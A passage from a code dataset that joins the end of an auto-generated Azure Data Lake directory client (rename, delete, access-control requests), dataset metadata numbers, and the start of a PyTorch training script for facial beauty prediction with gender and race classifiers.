    if_unmodified_since = None
    if modified_access_conditions is not None:
        if_unmodified_since = modified_access_conditions.if_unmodified_since
    if_match = None
    if modified_access_conditions is not None:
        if_match = modified_access_conditions.if_match
    if_none_match = None
    if modified_access_conditions is not None:
        if_none_match = modified_access_conditions.if_none_match
    # Conditional-request values evaluated against the SOURCE path.
    source_if_modified_since = None
    if source_modified_access_conditions is not None:
        source_if_modified_since = source_modified_access_conditions.source_if_modified_since
    source_if_unmodified_since = None
    if source_modified_access_conditions is not None:
        source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
    source_if_match = None
    if source_modified_access_conditions is not None:
        source_if_match = source_modified_access_conditions.source_if_match
    source_if_none_match = None
    if source_modified_access_conditions is not None:
        source_if_none_match = source_modified_access_conditions.source_if_none_match

    # Construct URL
    url = self.rename.metadata['url']
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    if marker is not None:
        query_parameters['continuation'] = self._serialize.query("marker", marker, 'str')
    if path_rename_mode is not None:
        query_parameters['mode'] = self._serialize.query("path_rename_mode", path_rename_mode, 'PathRenameMode')

    # Construct headers
    header_parameters = {}
    header_parameters['x-ms-rename-source'] = self._serialize.header("rename_source", rename_source, 'str')
    if directory_properties is not None:
        header_parameters['x-ms-properties'] = self._serialize.header("directory_properties", directory_properties, 'str')
    if posix_permissions is not None:
        header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
    if posix_umask is not None:
        header_parameters['x-ms-umask'] = self._serialize.header("posix_umask", posix_umask, 'str')
    if source_lease_id is not None:
        header_parameters['x-ms-source-lease-id'] = self._serialize.header("source_lease_id", source_lease_id, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
    if cache_control is not None:
        header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", cache_control, 'str')
    if content_type is not None:
        header_parameters['x-ms-content-type'] = self._serialize.header("content_type", content_type, 'str')
    if content_encoding is not None:
        header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", content_encoding, 'str')
    if content_language is not None:
        header_parameters['x-ms-content-language'] = self._serialize.header("content_language", content_language, 'str')
    if content_disposition is not None:
        header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", content_disposition, 'str')
    if lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
    if if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
    if if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    if if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
    if source_if_modified_since is not None:
        header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", source_if_modified_since, 'rfc-1123')
    if source_if_unmodified_since is not None:
        header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123')
    if source_if_match is not None:
        header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", source_if_match, 'str')
    if source_if_none_match is not None:
        header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", source_if_none_match, 'str')

    # Construct and send request
    request = self._client.put(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 201 Created is the only success status for this operation.
    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise models.DataLakeStorageErrorException(response, self._deserialize)

    if cls:
        response_headers = {
            'x-ms-continuation': self._deserialize('str', response.headers.get('x-ms-continuation')),
            'ETag': self._deserialize('str', response.headers.get('ETag')),
            'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
            'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
            'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
            'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
            'Content-Length': self._deserialize('long', response.headers.get('Content-Length')),
            'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
        }
        return cls(response, None, response_headers)
rename.metadata = {'url': '/{filesystem}/{path}'}
async def delete(self, recursive_directory_delete, timeout=None, marker=None, request_id=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
    """Deletes the directory.

    :param recursive_directory_delete: If "true", all paths beneath the
     directory will be deleted. If "false" and the directory is non-empty,
     an error occurs.
    :type recursive_directory_delete: bool
    :param timeout: The timeout parameter is expressed in seconds. For
     more information, see <a
     href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
     Timeouts for Blob Service Operations.</a>
    :type timeout: int
    :param marker: When deleting a directory, the number of paths that are
     deleted with each invocation is limited. If the number of paths to be
     deleted exceeds this limit, a continuation token is returned in the
     x-ms-continuation response header. When a continuation token is
     returned in the response, it must be specified in a subsequent
     invocation of the delete operation to continue deleting the directory.
    :type marker: str
    :param request_id: Provides a client-generated, opaque value with a 1
     KB character limit that is recorded in the analytics logs when storage
     analytics logging is enabled.
    :type request_id: str
    :param lease_access_conditions: Additional parameters for the operation
    :type lease_access_conditions: ~.models.LeaseAccessConditions
    :param modified_access_conditions: Additional parameters for the operation
    :type modified_access_conditions: ~.models.ModifiedAccessConditions
    :param callable cls: A custom type or function that will be passed the
     direct response
    :return: None or the result of cls(response)
    :rtype: None
    :raises:
     :class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
    """
    # Caller may override the status-code -> exception mapping via kwargs.
    error_map = kwargs.pop('error_map', None)
    # Flatten the optional parameter-grouping models into individual values;
    # each stays None when its grouping object was not supplied.
    lease_id = None
    if lease_access_conditions is not None:
        lease_id = lease_access_conditions.lease_id
    if_modified_since = None
    if modified_access_conditions is not None:
        if_modified_since = modified_access_conditions.if_modified_since
    if_unmodified_since = None
    if modified_access_conditions is not None:
        if_unmodified_since = modified_access_conditions.if_unmodified_since
    if_match = None
    if modified_access_conditions is not None:
        if_match = modified_access_conditions.if_match
    if_none_match = None
    if modified_access_conditions is not None:
        if_none_match = modified_access_conditions.if_none_match

    # Construct URL
    url = self.delete.metadata['url']
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    query_parameters['recursive'] = self._serialize.query("recursive_directory_delete", recursive_directory_delete, 'bool')
    if marker is not None:
        query_parameters['continuation'] = self._serialize.query("marker", marker, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
    if lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
    if if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
    if if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    if if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')

    # Construct and send request
    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 OK is the only success status for this operation.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise models.DataLakeStorageErrorException(response, self._deserialize)

    if cls:
        response_headers = {
            'x-ms-continuation': self._deserialize('str', response.headers.get('x-ms-continuation')),
            'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
            'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
            'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
            'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
        }
        return cls(response, None, response_headers)
delete.metadata = {'url': '/{filesystem}/{path}'}
async def set_access_control(self, timeout=None, owner=None, group=None, posix_permissions=None, posix_acl=None, request_id=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
    """Set the owner, group, permissions, or access control list for a
    directory.

    :param timeout: Optional operation timeout in seconds. See
     <a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
     Timeouts for Blob Service Operations.</a>
    :type timeout: int
    :param owner: Optional. The owner of the blob or directory.
    :type owner: str
    :param group: Optional. The owning group of the blob or directory.
    :type group: str
    :param posix_permissions: Optional; valid only with Hierarchical
     Namespace enabled. POSIX access permissions for owner, owning group
     and others, in symbolic (rwxrw-rw-) or 4-digit octal (e.g. 0766)
     notation. Sticky bit is supported.
    :type posix_permissions: str
    :param posix_acl: POSIX access control list: a comma-separated list of
     ACEs, each "[scope:][type]:[id]:[permissions]".
    :type posix_acl: str
    :param request_id: Client-generated, opaque value (1 KB limit) recorded
     in analytics logs when storage analytics logging is enabled.
    :type request_id: str
    :param lease_access_conditions: Additional parameters for the operation
    :type lease_access_conditions: ~.models.LeaseAccessConditions
    :param modified_access_conditions: Additional parameters for the
     operation
    :type modified_access_conditions: ~.models.ModifiedAccessConditions
    :param callable cls: A custom type or function that will be passed the
     direct response
    :return: None or the result of cls(response)
    :rtype: None
    :raises:
     :class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
    """
    error_map = kwargs.pop('error_map', None)

    # Flatten the optional parameter-group objects into plain locals.
    lease_id = None if lease_access_conditions is None else lease_access_conditions.lease_id
    if modified_access_conditions is None:
        if_match = if_none_match = if_modified_since = if_unmodified_since = None
    else:
        if_match = modified_access_conditions.if_match
        if_none_match = modified_access_conditions.if_none_match
        if_modified_since = modified_access_conditions.if_modified_since
        if_unmodified_since = modified_access_conditions.if_unmodified_since
    action = "setAccessControl"

    # Build the request URL from the operation's metadata template.
    url = self._client.format_url(
        self.set_access_control.metadata['url'],
        url=self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True))

    # Query string: optional timeout plus the mandatory action selector.
    query_parameters = {}
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    query_parameters['action'] = self._serialize.query("action", action, 'str')

    # Request headers: emit only the optional ones that were supplied.
    header_parameters = {}
    for wire_name, py_name, value, data_type in [
            ('x-ms-owner', "owner", owner, 'str'),
            ('x-ms-group', "group", group, 'str'),
            ('x-ms-permissions', "posix_permissions", posix_permissions, 'str'),
            ('x-ms-acl', "posix_acl", posix_acl, 'str'),
            ('x-ms-client-request-id', "request_id", request_id, 'str')]:
        if value is not None:
            header_parameters[wire_name] = self._serialize.header(py_name, value, data_type)
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    for wire_name, py_name, value, data_type in [
            ('x-ms-lease-id', "lease_id", lease_id, 'str'),
            ('If-Match', "if_match", if_match, 'str'),
            ('If-None-Match', "if_none_match", if_none_match, 'str'),
            ('If-Modified-Since', "if_modified_since", if_modified_since, 'rfc-1123'),
            ('If-Unmodified-Since', "if_unmodified_since", if_unmodified_since, 'rfc-1123')]:
        if value is not None:
            header_parameters[wire_name] = self._serialize.header(py_name, value, data_type)

    # Send the PATCH request and raise on any non-200 status.
    request = self._client.patch(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise models.DataLakeStorageErrorException(response, self._deserialize)
    if cls:
        # Deserialize the response headers of interest for the custom callback.
        response_headers = {
            name: self._deserialize(data_type, response.headers.get(name))
            for name, data_type in [
                ('Date', 'rfc-1123'),
                ('ETag', 'str'),
                ('Last-Modified', 'rfc-1123'),
                ('x-ms-request-id', 'str'),
                ('x-ms-version', 'str'),
                ('x-ms-client-request-id', 'str'),
            ]
        }
        return cls(response, None, response_headers)
set_access_control.metadata = {'url': '/{filesystem}/{path}'}
async def get_access_control(self, timeout=None, upn=None, request_id=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
    """Get the owner, group, permissions, or access control list for a
    directory.

    :param timeout: Optional operation timeout in seconds. See
     <a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
     Timeouts for Blob Service Operations.</a>
    :type timeout: int
    :param upn: Optional; valid only with Hierarchical Namespace enabled.
     If "true", identity values in the x-ms-owner, x-ms-group and x-ms-acl
     response headers are transformed from Azure Active Directory Object
     IDs to User Principal Names; if "false" (the default) they are
     returned as Object IDs.
    :type upn: bool
    :param request_id: Client-generated, opaque value (1 KB limit) recorded
     in analytics logs when storage analytics logging is enabled.
    :type request_id: str
    :param lease_access_conditions: Additional parameters for the operation
    :type lease_access_conditions: ~.models.LeaseAccessConditions
    :param modified_access_conditions: Additional parameters for the
     operation
    :type modified_access_conditions: ~.models.ModifiedAccessConditions
    :param callable cls: A custom type or function that will be passed the
     direct response
    :return: None or the result of cls(response)
    :rtype: None
    :raises:
     :class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
    """
    error_map = kwargs.pop('error_map', None)

    # Flatten the optional parameter-group objects into plain locals.
    lease_id = None if lease_access_conditions is None else lease_access_conditions.lease_id
    if modified_access_conditions is None:
        if_match = if_none_match = if_modified_since = if_unmodified_since = None
    else:
        if_match = modified_access_conditions.if_match
        if_none_match = modified_access_conditions.if_none_match
        if_modified_since = modified_access_conditions.if_modified_since
        if_unmodified_since = modified_access_conditions.if_unmodified_since
    action = "getAccessControl"

    # Build the request URL from the operation's metadata template.
    url = self._client.format_url(
        self.get_access_control.metadata['url'],
        url=self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True))

    # Query string: optional timeout/upn plus the mandatory action selector.
    query_parameters = {}
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    if upn is not None:
        query_parameters['upn'] = self._serialize.query("upn", upn, 'bool')
    query_parameters['action'] = self._serialize.query("action", action, 'str')

    # Request headers: emit only the optional ones that were supplied.
    header_parameters = {}
    if request_id is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    for wire_name, py_name, value, data_type in [
            ('x-ms-lease-id', "lease_id", lease_id, 'str'),
            ('If-Match', "if_match", if_match, 'str'),
            ('If-None-Match', "if_none_match", if_none_match, 'str'),
            ('If-Modified-Since', "if_modified_since", if_modified_since, 'rfc-1123'),
            ('If-Unmodified-Since', "if_unmodified_since", if_unmodified_since, 'rfc-1123')]:
        if value is not None:
            header_parameters[wire_name] = self._serialize.header(py_name, value, data_type)

    # Send the HEAD request and raise on any non-200 status.
    request = self._client.head(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise models.DataLakeStorageErrorException(response, self._deserialize)
    if cls:
        # Deserialize the response headers of interest (the access-control
        # result itself travels in x-ms-owner/group/permissions/acl).
        response_headers = {
            name: self._deserialize(data_type, response.headers.get(name))
            for name, data_type in [
                ('Date', 'rfc-1123'),
                ('ETag', 'str'),
                ('Last-Modified', 'rfc-1123'),
                ('x-ms-owner', 'str'),
                ('x-ms-group', 'str'),
                ('x-ms-permissions', 'str'),
                ('x-ms-acl', 'str'),
                ('x-ms-request-id', 'str'),
                ('x-ms-version', 'str'),
                ('x-ms-client-request-id', 'str'),
            ]
        }
        return cls(response, None, response_headers)
get_access_control.metadata = {'url': '/{filesystem}/{path}'}
| 57.328378
| 355
| 0.680221
| 5,230
| 42,423
| 5.307648
| 0.065966
| 0.018553
| 0.033395
| 0.02972
| 0.898339
| 0.88519
| 0.8639
| 0.850571
| 0.840736
| 0.837206
| 0
| 0.004726
| 0.226976
| 42,423
| 739
| 356
| 57.405954
| 0.841739
| 0.029772
| 0
| 0.813896
| 0
| 0
| 0.137075
| 0.022901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002481
| false
| 0
| 0.004963
| 0
| 0.024814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a84fb0228e13b6f0335f40ddbed3a1f98034221
| 22,791
|
py
|
Python
|
main/fbp.py
|
lucasxlu/HMTNet
|
b66d92d5e408b0525f535f38bdf08ff1749e0152
|
[
"MIT"
] | 11
|
2019-10-28T07:47:03.000Z
|
2021-11-18T08:22:34.000Z
|
main/fbp.py
|
lucasxlu/HMTNet
|
b66d92d5e408b0525f535f38bdf08ff1749e0152
|
[
"MIT"
] | 1
|
2020-06-29T20:07:28.000Z
|
2020-06-29T21:18:29.000Z
|
main/fbp.py
|
lucasxlu/HMTNet
|
b66d92d5e408b0525f535f38bdf08ff1749e0152
|
[
"MIT"
] | 3
|
2021-08-28T00:17:17.000Z
|
2021-12-22T12:56:08.000Z
|
import copy
import time
import sys
import os
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim import lr_scheduler
from torchvision import transforms, datasets
from sklearn.metrics import mean_absolute_error, mean_squared_error
sys.path.append('../')
from models.vggm import VggM
from util import file_utils
from models.losses import HMTLoss
from models.hmtnet_fbp import RNet, GNet, HMTNet
from data.datasets import FaceGenderDataset, FaceRaceDataset, FaceDataset, FDataset
from config.cfg import cfg
from data import data_loader
def train_gnet(model, train_loader, test_loader, criterion, optimizer, num_epochs=200, inference=False):
    """Train or evaluate GNet, the gender classification branch.

    :param model: GNet module to train or evaluate
    :param train_loader: DataLoader yielding dicts with 'image' and 'gender'
    :param test_loader: evaluation DataLoader with the same dict format
    :param criterion: classification loss (e.g. ``nn.CrossEntropyLoss``)
    :param optimizer: optimizer built over ``model.parameters()``
    :param num_epochs: number of training epochs
    :param inference: if True, skip training and load './model/gnet.pth'
    :return: None (prints loss/accuracy and saves the model to disk)
    """
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    if torch.cuda.device_count() > 1:
        print("We are running on", torch.cuda.device_count(), "GPUs!")
        model = nn.DataParallel(model)
    model = model.to(device)  # move once instead of once per batch

    if not inference:
        model.train()
        for epoch in range(num_epochs):  # loop over the dataset multiple times
            running_loss = 0.0
            for i, data in enumerate(train_loader, 0):
                inputs, labels = data['image'], data['gender']
                inputs, labels = inputs.to(device), labels.to(device)
                # zero the parameter gradients
                optimizer.zero_grad()
                # forward + backward + optimize
                outputs = model(inputs)
                outputs = outputs.view(cfg['batch_size'], -1)
                loss = criterion(outputs, labels)
                loss.backward()
                optimizer.step()
                # print statistics
                running_loss += loss.item()
                if i % 50 == 49:  # print every 50 mini-batches
                    print('[%d, %5d] loss: %.5f' %
                          (epoch + 1, i + 1, running_loss / 50))
                    running_loss = 0.0
            # BUGFIX: advance the LR schedule once per epoch. The original
            # called step() a single time before the epoch loop, so the
            # StepLR(step_size=50) decay never took effect during training.
            exp_lr_scheduler.step()
        print('Finished Training')
        print('Save trained model...')
        model_path_dir = './model'
        file_utils.mkdirs_if_not_exist(model_path_dir)
        torch.save(model.state_dict(), os.path.join(model_path_dir, 'gnet.pth'))
    else:
        print('Loading pre-trained model...')
        model.load_state_dict(torch.load(os.path.join('./model/gnet.pth')))

    model.eval()
    correct = 0
    total = 0
    with torch.no_grad():  # gradients are not needed for evaluation
        for data in test_loader:
            images, labels = data['image'], data['gender']
            labels = labels.to(device)
            outputs = model(images.to(device))
            outputs = outputs.view(cfg['batch_size'], 2)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    print('correct = %d ...' % correct)
    print('total = %d ...' % total)
    print('Accuracy of the network on test images: %f' % (correct / total))
def train_rnet(model, train_loader, test_loader, criterion, optimizer, num_epochs=200, inference=False):
    """Train or evaluate RNet, the race classification branch.

    (The original docstring wrongly said "train GNet".)

    :param model: RNet module to train or evaluate
    :param train_loader: DataLoader yielding dicts with 'image' and 'race'
    :param test_loader: evaluation DataLoader with the same dict format
    :param criterion: classification loss (e.g. ``nn.CrossEntropyLoss``)
    :param optimizer: optimizer built over ``model.parameters()``
    :param num_epochs: number of training epochs
    :param inference: if True, skip training and load './model/rnet.pth'
    :return: None (prints loss/accuracy and saves the model to disk)
    """
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    if torch.cuda.device_count() > 1:
        print("We are running on", torch.cuda.device_count(), "GPUs!")
        model = nn.DataParallel(model)
    model = model.to(device)  # move once instead of once per batch

    if not inference:
        model.train()
        for epoch in range(num_epochs):  # loop over the dataset multiple times
            running_loss = 0.0
            for i, data in enumerate(train_loader, 0):
                inputs, labels = data['image'], data['race']
                inputs, labels = inputs.to(device), labels.to(device)
                # zero the parameter gradients
                optimizer.zero_grad()
                # forward + backward + optimize
                outputs = model(inputs)
                outputs = outputs.view(cfg['batch_size'], 2)
                loss = criterion(outputs, labels)
                loss.backward()
                optimizer.step()
                # print statistics
                running_loss += loss.item()
                if i % 50 == 49:  # print every 50 mini-batches
                    print('[%d, %5d] loss: %.5f' %
                          (epoch + 1, i + 1, running_loss / 50))
                    running_loss = 0.0
            # BUGFIX: advance the LR schedule once per epoch. The original
            # called step() a single time before the epoch loop, so the
            # StepLR(step_size=50) decay never took effect during training.
            exp_lr_scheduler.step()
        print('Finished Training')
        print('Save trained model...')
        model_path_dir = './model'
        file_utils.mkdirs_if_not_exist(model_path_dir)
        torch.save(model.state_dict(), os.path.join(model_path_dir, 'rnet.pth'))
    else:
        print('Loading pre-trained model...')
        model.load_state_dict(torch.load(os.path.join('./model/rnet.pth')))

    model.eval()
    correct = 0
    total = 0
    with torch.no_grad():  # gradients are not needed for evaluation
        for data in test_loader:
            images, labels = data['image'], data['race']
            labels = labels.to(device)
            outputs = model(images.to(device))
            outputs = outputs.view(cfg['batch_size'], 2)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    print('correct = %d ...' % correct)
    print('total = %d ...' % total)
    print('Accuracy of the RNet on test images: %f' % (correct / total))
def finetune_vgg_m_model(model_ft, train_loader, test_loader, criterion, num_epochs=200, inference=False):
    """Fine-tune a pre-trained VGG-M face model for attractiveness regression.

    :param model_ft: VggM model whose ``fc8`` head is replaced by a
        2-channel 1x1 conv; the two channels are averaged into one score
    :param train_loader: DataLoader yielding dicts with 'image' and
        'attractiveness'
    :param test_loader: evaluation DataLoader with the same dict format
    :param criterion: regression loss (e.g. ``nn.MSELoss``)
    :param num_epochs: number of training epochs
    :param inference: if True, skip training and load './model/ft_vgg_m.pth'
    :return: None (prints loss/metrics and saves the model to disk)
    """
    # Replace the classification head with a 2-channel 1x1 conv regressor.
    num_ftrs = model_ft.fc8.in_channels
    model_ft.fc8 = nn.Conv2d(num_ftrs, 2, 1)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    if torch.cuda.device_count() > 1:
        print("We are running on", torch.cuda.device_count(), "GPUs!")
        # dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs
        model_ft = nn.DataParallel(model_ft)
    model_ft = model_ft.to(device)
    optimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9, weight_decay=1e-4)
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=50, gamma=0.1)

    if not inference:
        for epoch in range(num_epochs):  # loop over the dataset multiple times
            exp_lr_scheduler.step()
            model_ft.train()
            running_loss = 0.0
            for i, data in enumerate(train_loader, 0):
                inputs, labels = data['image'], data['attractiveness'].float()
                inputs, labels = inputs.to(device), labels.to(device)
                # zero the parameter gradients
                optimizer_ft.zero_grad()
                # forward + backward + optimize; average the two output
                # channels into a single scalar score per sample
                outputs = model_ft(inputs)
                outputs = (torch.sum(outputs, dim=1) / 2).view(cfg['batch_size'], 1)
                outputs = outputs.view(cfg['batch_size'])
                loss = criterion(outputs, labels)
                loss.backward()
                optimizer_ft.step()
                # print statistics
                running_loss += loss.item()
                if i % 50 == 49:  # print every 50 mini-batches
                    print('[%d, %5d] loss: %.5f' %
                          (epoch + 1, i + 1, running_loss / 50))
                    running_loss = 0.0
        print('Finished Training')
        print('Save trained model...')
        model_path_dir = './model'
        file_utils.mkdirs_if_not_exist(model_path_dir)
        torch.save(model_ft.state_dict(), os.path.join(model_path_dir, 'ft_vgg_m.pth'))
    else:
        print('Loading pre-trained model...')
        model_ft.load_state_dict(torch.load(os.path.join('./model/ft_vgg_m.pth')))

    # BUGFIX: the original evaluation reshaped the (B, 2, 1, 1) regression
    # output with view(cfg['batch_size']) (element-count mismatch) and then
    # called torch.max(outputs, 1) on a 1-D tensor, which raises at runtime;
    # it also computed classification "accuracy" on continuous labels.
    # Report regression metrics instead, consistent with train_anet.
    model_ft.eval()
    predicted_values = []
    gt_values = []
    with torch.no_grad():  # gradients are not needed for evaluation
        for data in test_loader:
            images, labels = data['image'], data['attractiveness'].float()
            outputs = model_ft(images.to(device))
            # same two-channel averaging as in training
            outputs = (torch.sum(outputs, dim=1) / 2).view(-1)
            predicted_values += outputs.to("cpu").numpy().tolist()
            gt_values += labels.numpy().tolist()
    mae = round(mean_absolute_error(np.array(gt_values), np.array(predicted_values).ravel()), 4)
    rmse = round(float(np.sqrt(mean_squared_error(np.array(gt_values), np.array(predicted_values).ravel()))), 4)
    pc = round(np.corrcoef(np.array(gt_values), np.array(predicted_values).ravel())[0, 1], 4)
    print('The Mean Absolute Error of fine-tuned VGG-M is {0}'.format(mae))
    print('The Root Mean Square Error of fine-tuned VGG-M is {0}'.format(rmse))
    print('The Pearson Correlation of fine-tuned VGG-M is {0}'.format(pc))
def train_anet(model_ft, train_loader, test_loader, criterion, num_epochs=200, inference=False):
    """Train or evaluate ANet, the attractiveness regression branch.

    :param model_ft: VggM-style model whose ``fc8`` head is replaced by a
        single-channel 1x1 conv regressor
    :param train_loader: DataLoader yielding dicts with 'image' and
        'attractiveness'
    :param test_loader: evaluation DataLoader with the same dict format
    :param criterion: regression loss (e.g. ``nn.MSELoss``)
    :param num_epochs: number of training epochs
    :param inference: if True, skip training and load './model/anet.pth'
    :return: None (prints loss and MAE/RMSE/PC metrics, saves the model)
    """
    # Replace the head with a single-channel 1x1 conv regressor.
    num_ftrs = model_ft.fc8.in_channels
    model_ft.fc8 = nn.Conv2d(num_ftrs, 1, 1)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    if torch.cuda.device_count() > 1:
        print("We are running on", torch.cuda.device_count(), "GPUs!")
        model_ft = nn.DataParallel(model_ft)
    model_ft = model_ft.to(device)
    optimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9, weight_decay=1e-4)
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=50, gamma=0.1)

    if not inference:
        for epoch in range(num_epochs):  # loop over the dataset multiple times
            exp_lr_scheduler.step()
            model_ft.train()
            running_loss = 0.0
            for i, data in enumerate(train_loader, 0):
                inputs, labels = data['image'], data['attractiveness']
                inputs, labels = inputs.to(device), labels.float().to(device)
                # zero the parameter gradients
                optimizer_ft.zero_grad()
                # forward + backward + optimize
                outputs = model_ft(inputs)
                outputs = outputs.view(cfg['batch_size'])
                loss = criterion(outputs, labels)
                loss.backward()
                optimizer_ft.step()
                # print statistics
                running_loss += loss.item()
                if i % 50 == 49:  # print every 50 mini-batches
                    print('[%d, %5d] loss: %.5f' %
                          (epoch + 1, i + 1, running_loss / 50))
                    running_loss = 0.0
        print('Finished Training')
        print('Save trained model...')
        model_path_dir = './model'
        file_utils.mkdirs_if_not_exist(model_path_dir)
        torch.save(model_ft.state_dict(), os.path.join(model_path_dir, 'anet.pth'))
    else:
        print('Loading pre-trained model...')
        model_ft.load_state_dict(torch.load(os.path.join('./model/anet.pth')))

    model_ft.eval()
    predicted_labels = []
    gt_labels = []
    with torch.no_grad():  # gradients are not needed for evaluation
        for i, data in enumerate(test_loader, 0):
            images, labels = data['image'], data['attractiveness']
            labels = labels.to(device)
            outputs = model_ft(images.to(device))
            predicted_labels += outputs.to("cpu").data.numpy().tolist()
            gt_labels += labels.to("cpu").numpy().tolist()
    # sklearn metrics are imported at module level; the original re-imported
    # them here redundantly. np.math.sqrt was replaced by np.sqrt because
    # the np.math alias is removed in NumPy 2.0.
    mae_lr = round(mean_absolute_error(np.array(gt_labels), np.array(predicted_labels).ravel()), 4)
